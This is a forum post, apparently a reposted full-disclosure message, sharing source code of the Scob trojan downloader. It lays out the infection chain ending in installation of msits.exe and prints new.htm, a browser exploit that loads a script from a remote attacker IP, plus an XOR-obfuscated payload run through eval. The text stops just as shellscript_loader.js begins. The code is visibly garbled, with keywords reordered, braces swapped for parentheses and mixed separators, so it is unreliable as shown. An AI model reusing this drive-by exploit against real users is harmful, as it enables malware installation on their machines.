[SCR] scob.trojan

[kenchiro75]

[hide=30] Hello,

here is some full disclosure: below the source code of the Scob trojan downloader, if you want to know more about it.

Best Regards.
Franck Olivel - Security Engineer
K-OTik Security Survey 24 / 7
http://www.k-otik.com

-------------------------------------------------- -------------------
Compromised - (redirect) -> http://217.107.218 .***/ dot.php - (redirect) -> new.htm - (executed) -> md.htm & shellscript_loader.js - (executed) -> shellscript.js - (install) -> msits.exe

--------
new.htm
--------
[code] <script language="Javascript">
InjectedDuringRedirection function () (
showModalDialog ( &#39;md.htm&#39; window, "dialogTop: -10000 \; dialogLeft: --
10000 \; dialogHeight: 1 \; dialogWidth: 1 \; "). Arrivals =" javascript &#39;<script SRC=\\&#39;http://217.107.218.***/shellscript_loader.js\\&#39;> <\ / script> ";
) </ script>
<script language="javascript"> setTimeout ( "myiframe.execScript (InjectedDuringRedirection.toString ())", 100
);
setTimeout ( "myiframe.execScript ( &#39;InjectedDuringRedirection ()&#39", 101);
document.write ( &#39;<IFRAME ID = myiframe NAME = myiframe SRC = "redir.php" WIDTH = 0
HEIGHT = 0> </ IFRAME >&#39;</ script>
<script>
x = 34;
es = "84, 66, 86, 5, 73, 119; 71; 89; 95; 91, 12, 16, 14, 88; 89; 95; 86; 92; 67; 27; 85; 69; 9
3; 88, 78 and 94; 108; 82, 78, 74, 48, 105, 107, 120; 73; 79, 48, 38, 58; 105; 37, 9, 35; 41; 55
, 111, 109, 113, 61, 3, 59, 37, 35, 39, 118; 61; 53; 56, 41, 48, 59, 49, 20, 79, 0, 12, 0; 28;
93; 106; 98, 6, 40, 4, 8, 20, 64, 28, 4, 8, 30, 22 and 90, 23, 23, 20, 19, 30, 8, 20, 9, 19, 26; 60
, 239, 237, 237, 241, 164, 184, 166, 165, 255, 225, 227, 255, 233, 175, 181, 130, 154; 25
4, 208, 252, 240, 236, 184, 228, 236, 224, 246, 254, 178, 255, 241, 237, 196, 196, 208, 1
31, 153, 133, 132, 208, 192, 192, 222, 206, 140, 156, 222, 215, 146, 138, 191, 185, 219;
247, 217, 211, 193, 151, 211, 213, 210, 216, 204, 247, 148, 140, 142, 254, 227, 249, 169
, 165, 162, 172, 169, 191, 236, 169, 175, 187, 177, 236, 242, 241, 153, 134, 251, 158; 14
0; 138, 224, 182, 180, 169, 179, 179, 218, 135, 139, 143, 129, 223, 201, 200, 171, 211, 1
82, 183, 161, 172, 167, 161, 222, 188, 186, 167, 213, 157, 130, 131, 136, 195, 213, 212;
206, 204, 201, 209, 305, 305, 309, 301, 310, 308, 318, 297, 313, 317, 317, 292, 291, 352
, 367, 358, 382, 319, 369, 379, 377, 303, 300, 312, 373, 376, 371, 373, 306, 373, 362; 37
0; 258, 257, 342, 346, 340, 320, 283, 261, 348, 332, 338, 351, 259, 341, 259, 348, 339; 3
23; 347, 323, 320, 345, 339, 323, 282, 263, 262, 276, 339, 351, 340, 346, 291, 309, 380;
356, 383, 328, 332, 296, 280, 294, 314, 318, 316, 355, 317, 295, 319, 294, 378, 358, 356
, 357, 358, 379, 376, 364, 362, 363, 364, 369, 382, 366, 332, 321, 339, 335, 324, 257; 26
5; 260, 285, 260, 271, 261, 280, 323, 268, 256, 276, 264, 347, 328; "
var ds = new String (); ads = es.split (";"); k = ads.length-1;
for (var j = 0; j <k j + +)
(e = ads [j] d = e ^ x x + = 1; ds = + ds String.fromCharCode (d) eval (ds)
</ script>

---------------------
shellscript_loader.js
---------------------
getRealShell function () (